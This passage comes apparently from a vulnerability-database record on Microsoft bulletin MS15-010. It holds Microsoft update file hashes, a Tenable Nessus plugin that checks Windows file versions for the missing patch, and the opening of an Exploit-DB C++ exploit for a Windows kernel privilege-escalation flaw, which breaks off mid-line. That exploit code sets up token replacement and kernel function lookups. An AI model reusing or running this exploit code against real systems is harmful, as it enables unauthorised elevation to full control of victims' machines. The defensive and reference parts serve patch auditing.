class=\"sbody-td\">WindowsServer2003-KB3023562-x64-FRA.exe</td><td class=\"sbody-td\">C855E5FDED8407794F1544EC2F58138B4822889E</td><td class=\"sbody-td\">91D3384765B9AC72455A36C33B845EF57A70E61159EC8CCB33CCA0301A857000</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-ITA.exe</td><td class=\"sbody-td\">5D5A5722E2D2923EE5FA6CA68E4F55194AAA2E48</td><td class=\"sbody-td\">0F4C185C1380532041A974BE0361129AE871D131487DA89DAAF7097A128ADA43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-ITA.exe</td><td class=\"sbody-td\">F7D434B5D162449EFAC47FDB9A02082A1951915B</td><td class=\"sbody-td\">EA2D9518C3092319102B5CE0AC01847A5FA7F2C54570CDCA2DE89B4C6D9719F9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-JPN.exe</td><td class=\"sbody-td\">0125198CF92D92F0F5AD1524B291562C287B0B54</td><td class=\"sbody-td\">CC979DD90F0CE0FB99A0FC36F9C67E2C2E5CC4FA09CE11C23DC04E4C6AF93A75</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-JPN.exe</td><td class=\"sbody-td\">0C9B42DF01CD4EA1F732F1C5987E8CB5712DF5CE</td><td class=\"sbody-td\">2D1DEE50811210B1EF64EB769FB7A98DE6399E57C6635DFA175C9BD13D5336D3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-KOR.exe</td><td class=\"sbody-td\">E70FEC61A893D8DEBC3DA5DE3D93B1E91D154A22</td><td class=\"sbody-td\">938AD5DEFE1CC32BF626EC30E11949DEE4D43EFB1D4146D8A4BC1BD425338D24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-KOR.exe</td><td class=\"sbody-td\">EC7114E1918C187327BC146923AB881C73257075</td><td class=\"sbody-td\">72C913CFA9F748B89FCF71C0C61A25D236A8E5FF64DC296F4BD4D6086CE0152D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-PTB.exe</td><td class=\"sbody-td\">67503B1D02B84196037C4B20276FEBE2032F081F</td><td class=\"sbody-td\">0FF90BA711117C8C037995ABA82FFD5235B001C460AC1ECE3226CDAD3D82EDB9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-PTB.exe</td><td class=\"sbody-td\">B9C54C1145BBFCAD4452115E25C21520840B505E</td><td class=\"sbody-td\">4678A1B8A31C53F3991E0441B02619F32A72DCF9BB5386D371B6BF2587ABAD13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-RUS.exe</td><td class=\"sbody-td\">0C40A79AF2505181C2A41C9C850A535F7F197B2B</td><td class=\"sbody-td\">C7C913DB544271DD81530F13E121E7FBD2021B0BD97CA0B16FDECF8B7ABB026B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x64-RUS.exe</td><td class=\"sbody-td\">641E7DCB9AF8DC79A0C0BE01C8F2067F8EB993BB</td><td class=\"sbody-td\">FA4AE7651D0A862F7FBD5F4DD736BDD7F7B274DC3C01C050511EF448339152DE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CHS.exe</td><td class=\"sbody-td\">A2B53DB7BC194344F6A5072BB14D5E4EAABB4EC4</td><td class=\"sbody-td\">4ABA1C3C0BC41015CF2BAA58EF73CA89CF05613ED39B5340C85988F8948E8602</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CHS.exe</td><td class=\"sbody-td\">C6947C91F939573238D59B5A38AC0777FBCFD1B0</td><td class=\"sbody-td\">72606C150E726C4E34C6E7FA83E043DAE8EE57D0E1A79E22E5A33FBFCF54314F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CHT.exe</td><td class=\"sbody-td\">6EDB44886E4A9705220BF63A2783CD1520A81678</td><td class=\"sbody-td\">9BE6D1E3930ADD3C0FDB931E3278586EE622B9C49E025E137BCC801B64DCC6EC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CHT.exe</td><td class=\"sbody-td\">ABC810BFB33156171096E42219A92D4F4C6BD1D1</td><td class=\"sbody-td\">BF754453776F1B24547E7AFF35D86CD40074A7993116F70DC04B239490C2DB4C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CSY.exe</td><td class=\"sbody-td\">427EF42978D37C4835373F77FAEECC2F440C8EB6</td><td class=\"sbody-td\">3CBAACF8CBD0D7ED16B2A85AB00108F18CE41DC459F6F1BEA025833BF23ADEB9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-CSY.exe</td><td class=\"sbody-td\">B2F2D101343E5FB1C15A97B463944F373F449246</td><td class=\"sbody-td\">5558AB4064CBD1B32DAF31E593F2670DA50BAEC0226E4036EE6805380B9C5FE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-DEU.exe</td><td class=\"sbody-td\">112B0B452FF429995FD1F34E927D08F93856CBC2</td><td class=\"sbody-td\">740EBECE49CE7CB6B054F0C34439B589612F2FB9A499DDF2A579BF64D1D36341</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-DEU.exe</td><td class=\"sbody-td\">303649598BD5476ABE68BD2F3F0F7CDE71417C78</td><td class=\"sbody-td\">122DDDB278470491FAC82FCBB916A0C078CFFE9A2E2C80724B7AC92ABD29D13E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-DEU.exe</td><td class=\"sbody-td\">79423A7B66B729C97CDBD98B0F2A6A4FFA564A21</td><td class=\"sbody-td\">536BBFB7F197B71C84FCB900B179939BB338936776E59FB1D6DEC5091F05DDC7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ENU.exe</td><td class=\"sbody-td\">54B69415E4A6464EC83149112C181F07E98A49A9</td><td class=\"sbody-td\">F22EDF1281CEAF55421F8D137135F77AF8A2D7463C161357E5A130EFDB18AAC3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ENU.exe</td><td class=\"sbody-td\">68CB878EB4F17D52E0B37BC0E07E40599EBBE9D4</td><td class=\"sbody-td\">A73EFA84745A9ED082F63F3980F5329609216CEA661FA2BD9F0740E6AE49682E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ENU.exe</td><td class=\"sbody-td\">6E80BB632D22DE59AC279425A4DC3273E0D0C1AB</td><td class=\"sbody-td\">77AA275F75C76B90436127E33D49EEAD78F8AB8B14DBDEE4FBACB66B390A7DF2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ESN.exe</td><td class=\"sbody-td\">4992927C28A2C5C87BC854FE4721A3F121FB03B0</td><td class=\"sbody-td\">9E2F6409F91123A7FB2625014BC34F77DCEE95ECC58A35FAE7D5254ACC471C36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ESN.exe</td><td class=\"sbody-td\">FFDC77E382B95C44E19F0885480A582F5AAE411E</td><td class=\"sbody-td\">E1B1048C2017C62738E2B5A044FC2ECEB8B7AAE0124F712B2C3C80771F832B00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-FRA.exe</td><td class=\"sbody-td\">74B569C8F9D91282E29C8F9F0EA43C1D1E3FB94A</td><td class=\"sbody-td\">DF871AFDEEAD4B88B284703111BE4D00C5ED1344C7DE646D4CD24F81418279BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-FRA.exe</td><td class=\"sbody-td\">AF9E60EE74D79A7F682A0B01D16C60D7D0B22F95</td><td class=\"sbody-td\">6EEB3ED611B50D54EAA5BEA51A87C5ED2153B6216B1C6B24A8E4248C3F309DBA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-HUN.exe</td><td class=\"sbody-td\">049F9AA02D551871FA41B57FF46011FCEBC04F22</td><td class=\"sbody-td\">22D1B03B2C79E1704AA898AB50D3172770AA113114F4E449990A7E887B54100D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-HUN.exe</td><td class=\"sbody-td\">E7FDBB28939F6C29F813A97B161BE08411EDB77F</td><td class=\"sbody-td\">0FEC6E287E5F2F8336307BB738A254594BCDEB5A669C9C6503339C7C5B1296AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ITA.exe</td><td class=\"sbody-td\">94D0CC87B4321394AD2E5967655B7EC025CCE937</td><td class=\"sbody-td\">007D0BD725BF9D171DEE2F621242F8B87FFC10C3C27B9AB1D06C3FA88EA331E6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-ITA.exe</td><td class=\"sbody-td\">E497F3BED370CD91A155E0323C2B9BAC74AD1B93</td><td class=\"sbody-td\">25C1D69B957C79CB15121D54B7469C8BF433E917CFD8D8C7E3C7FD49DB9FFA25</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-JPN.exe</td><td class=\"sbody-td\">6B0CEDA94BF796894AC432A42559F7F7EC302416</td><td class=\"sbody-td\">89ADAB3810D7D7710023A35C1B5E89EB3895F13FC5D3E21BE237C0DF51183E8A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-JPN.exe</td><td class=\"sbody-td\">F19AF3DE0A57EBBAD15F1EC9E99C036B7AC817EA</td><td class=\"sbody-td\">4AD94EA0AE9394EA5016FFBA759E97BC5153D838ED871630C977D6E9C5A4BAE1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-KOR.exe</td><td class=\"sbody-td\">1154010FE061774039331F2C6AE93B0763222514</td><td class=\"sbody-td\">C9C0976608C5C707A25B59999CD6C5B95918D367574DA6B2BB31AF6AA482DCDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-KOR.exe</td><td class=\"sbody-td\">46552D4F03D37B5E9DEA0BAC21EFC47DE74A32CF</td><td class=\"sbody-td\">726F293E27050BB2DEA00A91D4019557CCD6BDFF923DD24C890CF517C40C0267</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-NLD.exe</td><td class=\"sbody-td\">02E41853851041649792264B1D63666AC94E632D</td><td class=\"sbody-td\">377638161D9EB676EE7C12DF9549531A61F2F48EF2994E185A7EDDCB071FC05C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-NLD.exe</td><td class=\"sbody-td\">4899337AD7315154F405F74603E98FE21A8AFA0A</td><td class=\"sbody-td\">72B8E33731642AD157468350424830A3FC33884F08F8B20AF1A511630A4F97E0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PLK.exe</td><td class=\"sbody-td\">592E636A5A633C6267006247CA2D63988C41D4BA</td><td class=\"sbody-td\">AD95A07308608349F2722D92F48E2D93554528EC1A4180CC58B939F193E04431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PLK.exe</td><td class=\"sbody-td\">D7F148CBA81B739941617FEC4BF306F928B5FA0A</td><td class=\"sbody-td\">AC9A0E73C22E09CF6C601934774EA561D6A5FB67CBD743502C1229028D477007</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PTB.exe</td><td class=\"sbody-td\">67A77BFE623E5153475FE50EEBEA163D21A6FF94</td><td class=\"sbody-td\">D5FE8CC8797E3E056B420C289099C1B083213CA860D49BB28FD0DC33E8F00A77</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PTB.exe</td><td class=\"sbody-td\">D39718203940781A54223BEB55CCEC32B8B86E93</td><td class=\"sbody-td\">BF5558BEDADF0A8CE61A6E11A80E2D7B0DE82781BFB289755778CBD91AB7EE8A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PTG.exe</td><td class=\"sbody-td\">B6ED25F9EAD66BB7D04213B3AC2C165EAAD48D94</td><td class=\"sbody-td\">DD76AE3892DC8170B6041F69F458979AED92E83986A96489A1E19AB6BAF4B563</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-PTG.exe</td><td class=\"sbody-td\">D0A24D5D2AE7CCA3038C8E97D488CAB72217B814</td><td class=\"sbody-td\">689B1D84F2CBEFDDF5D2E00254EF4178E41984B994ED0B9856206E2E907C97C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-RUS.exe</td><td class=\"sbody-td\">23493941D00FC9C079159067E7A0021C1E98B627</td><td class=\"sbody-td\">7FFC462D6B90285ECCB750ED426778ACE70A878CBAD3A6396B4164BFF8FFB830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-RUS.exe</td><td class=\"sbody-td\">E4397A2795ADAF83098EFB230A42E44B1BDB566A</td><td class=\"sbody-td\">105C050C549C12EDA9348B0A5B8620BE82A8B1A65308B88EE1DE79CFF6ADA498</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-SVE.exe</td><td class=\"sbody-td\">E9A39F7FFE3A6ABA8B9D86ADA12FED0F891DD4A4</td><td class=\"sbody-td\">2951B1F90E4EE29AF1C564F638832B0FE6C368E4765A3BF824E89C1A7B48BF49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-SVE.exe</td><td class=\"sbody-td\">F5372BCA29EE63E72AC9CA6AA29BC0945D47ED05</td><td class=\"sbody-td\">E451E072E62360EBA145E59D542E7E071040EFC1E62B858C0D214387E622C523</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-TRK.exe</td><td class=\"sbody-td\">2D03159A38998AF53F1D8AFACBAF6077F8DD24AF</td><td class=\"sbody-td\">84CEA75E59D1216065350832F2229DC9C779C0C9F717B9DBF1350D8DDF4ED872</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3023562-x86-TRK.exe</td><td class=\"sbody-td\">BB9543F36CCA75A46521C8C8A0ABD06426F6E807</td><td class=\"sbody-td\">24EEA284A17C1A8F6375B65287CF3B0C9444E44425A74E40A15E4E03D5E24063</td></tr></table></div></div><br/></span></div></div></div></div></body></html>", "edition": 2, "modified": "2015-02-12T02:21:07", "id": "KB3036220", "href": "https://support.microsoft.com/en-us/help/3036220/", "published": "2015-02-10T00:00:00", "title": "MS15-010: Vulnerabilities in Windows kernel mode driver could allow remote code execution: February 10, 2015", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-04-01T06:16:03", "description": "The remote Windows host is missing a security patch. It is, therefore,\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists in the\n Windows kernel-mode driver that is caused by improperly\n handling objects in memory. (CVE-2015-0003,\n CVE-2015-0057)\n\n - A security feature bypass vulnerability exists in the\n Cryptography Next Generation kernel-mode driver when\n failing to properly validate and enforce impersonation\n levels. (CVE-2015-0010)\n\n - A privilege escalation vulnerability exists in the\n Windows kernel-mode driver due to a double-free\n condition. (CVE-2015-0058)\n\n - A remote code execution vulnerability exists in the\n Windows kernel-mode driver that is caused when\n improperly handling TrueType fonts. (CVE-2015-0059)\n\n - A denial of service vulnerability exists in the\n Windows kernel-mode driver that is caused when the\n Windows font mapper attempts to scale a font.\n (CVE-2015-0060)", "edition": 29, "published": "2015-02-10T00:00:00", "title": "MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0003", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0060", "CVE-2015-0010", "CVE-2015-0058"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS15-010.NASL", "href": "https://www.tenable.com/plugins/nessus/81263", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81263);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2015-0003\",\n \"CVE-2015-0010\",\n \"CVE-2015-0057\",\n \"CVE-2015-0058\",\n \"CVE-2015-0059\",\n \"CVE-2015-0060\"\n );\n script_bugtraq_id(\n 72457,\n 72461,\n 72466,\n 72468,\n 72470,\n 72472\n );\n script_xref(name:\"MSFT\", value:\"MS15-010\");\n script_xref(name:\"MSKB\", value:\"3013455\");\n script_xref(name:\"MSKB\", value:\"3023562\");\n script_xref(name:\"MSKB\", value:\"3036220\");\n\n script_name(english:\"MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220)\");\n script_summary(english:\"Checks the version of Win32k.sys, adtschema.dll, wdigest.dll, and schannel.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security patch. It is, therefore,\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists in the\n Windows kernel-mode driver that is caused by improperly\n handling objects in memory. (CVE-2015-0003,\n CVE-2015-0057)\n\n - A security feature bypass vulnerability exists in the\n Cryptography Next Generation kernel-mode driver when\n failing to properly validate and enforce impersonation\n levels. (CVE-2015-0010)\n\n - A privilege escalation vulnerability exists in the\n Windows kernel-mode driver due to a double-free\n condition. (CVE-2015-0058)\n\n - A remote code execution vulnerability exists in the\n Windows kernel-mode driver that is caused when\n improperly handling TrueType fonts. (CVE-2015-0059)\n\n - A denial of service vulnerability exists in the\n Windows kernel-mode driver that is caused when the\n Windows font mapper attempts to scale a font.\n (CVE-2015-0060)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-010\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2003, Vista, 2008,\n7, 2008 R2, 8, 2012, 8.1, and 2012 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-010';\n\nkbs = make_list(\n \"3013455\",\n \"3023562\",\n \"3036220\"\n);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# The 2k3 checks could flag XP 64, which is unsupported\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows XP\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # Windows 8.1 / 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", file:\"win32k.sys\", version:\"6.3.9600.17630\", min_version:\"6.3.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.3\", file:\"Adtschema.dll\", version:\"6.3.9600.17415\", min_version:\"6.3.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n\n # Windows 8 / 2012\n hotfix_is_vulnerable(os:\"6.2\", file:\"win32k.sys\", version:\"6.2.9200.21343\", min_version:\"6.2.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"win32k.sys\", version:\"6.2.9200.17226\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"wdigest.dll\", version:\"6.2.9200.21012\", min_version:\"6.2.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"wdigest.dll\", version:\"6.2.9200.16891\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n\n # Windows 7 / 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"win32k.sys\", version:\"6.1.7601.22919\", min_version:\"6.1.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"win32k.sys\", version:\"6.1.7601.18713\", min_version:\"6.1.7600.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"schannel.dll\", version:\"6.1.7601.22925\", min_version:\"6.1.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"schannel.dll\", version:\"6.1.7601.18606\", min_version:\"6.1.7600.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.23588\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19279\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"schannel.dll\", version:\"6.0.6002.23594\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"schannel.dll\", version:\"6.0.6002.19247\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\") ||\n\n # Windows 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"win32k.sys\", version:\"5.2.3790.5513\", dir:\"\\system32\", bulletin:bulletin, kb:\"3013455\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"schannel.dll\", version:\"5.2.3790.5516\", dir:\"\\system32\", bulletin:bulletin, kb:\"3023562\")\n\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T05:05:02", "description": "Microsoft Windows - Local Privilege Escalation (MS15-010). CVE-2015-0003,CVE-2015-0010,CVE-2015-0057,CVE-2015-0058,CVE-2015-0059,CVE-2015-0060. Local exploit...", "published": "2015-05-25T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Local Privilege Escalation MS15-010", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0003", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0060", "CVE-2015-0010", "CVE-2015-0058"], "modified": "2015-05-25T00:00:00", "id": "EDB-ID:37098", "href": "https://www.exploit-db.com/exploits/37098/", "sourceData": "// ex.cpp\r\n/*\r\n\tWindows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP\r\n\tCVE-2015-0003\r\n\tMarch 2015 (Public Release: May 24, 2015)\r\n\r\n\tTested on:\r\n\t\t\t\tx86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3\r\n\t\t\t\tx64: Win 2k8 SP1 | Win 2k8 R2 SP1\r\n\r\n\tAuthor: Skylake - skylake <at> mail <dot> com\r\n*/\r\n\r\n#include \"ex.h\"\r\n\r\n_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;\r\n_PsLookupProcessByProcessId PsLookupProcessByProcessId;\r\n_PsReferencePrimaryToken PsReferencePrimaryToken;\r\nDWORD Pid;\r\nATOM atom;\r\nBOOL KrnlMode, bSpawned;\r\n\r\nDWORD_PTR WINAPI pti()\r\n{\r\n#ifdef _M_X64\r\n\tLPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );\r\n\treturn ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );\r\n#else\r\n\tLPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );\r\n\treturn ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );\r\n#endif\r\n}\r\n\r\nBOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )\r\n{\r\n\tDWORD_PTR dwIndex, dwMask;\r\n\r\n#ifdef _M_X64\r\n\tdwMask = ~0xf;\r\n#else\r\n\tdwMask = ~7;\r\n#endif\r\n\t//\r\n\tdwCurrentValue &= dwMask;\r\n\r\n\tfor( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )\r\n\t{\r\n\t\tif( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )\r\n\t\t{\r\n\t\t\t//\r\n\t\t\tpdwStructure[dwIndex] = dwNewValue;\r\n\t\t\treturn TRUE;\r\n\t\t}\r\n\t}\r\n\r\n\treturn FALSE;\r\n}\r\n\r\nBOOL WINAPI Init()\r\n{\r\n\tHMODULE hMod = NULL;\r\n\tPVOID Base = NULL;\r\n\tOSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };\r\n\tPSYSTEM_MODULE_INFORMATION pm = NULL;\r\n\tBOOL RetVal = FALSE;\r\n\r\n\t__try {\r\n\r\n\t\tif( !GetVersionEx( &ov ) ) __leave;\r\n\r\n\t\tif( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )\r\n\t\t{\r\n\t\t\tatom = 0xc039;\r\n\t\t}\r\n\r\n\t\telse if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )\r\n\t\t{\r\n\t\t\tatom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;\r\n\t\t}\r\n\r\n\t\tif( !atom ) __leave;\r\n\r\n\t\t_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( \"ntdll.dll\" ) ), \"ZwQuerySystemInformation\" );\r\n\t\tif( !ZwQuerySystemInformation ) __leave;\r\n\r\n\t\tZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( \"ntdll.dll\" ) ), \"ZwAllocateVirtualMemory\" );\r\n\t\tif( !ZwAllocateVirtualMemory ) __leave;\r\n\r\n\t\tULONG len;\r\n\t\tLONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );\r\n\t\tif( !status ) __leave;\r\n\r\n\t\tpm = ( PSYSTEM_MODULE_INFORMATION ) 